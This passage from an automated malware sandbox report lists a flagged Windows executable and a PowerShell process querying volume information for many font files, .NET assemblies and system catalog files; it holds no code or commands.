                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
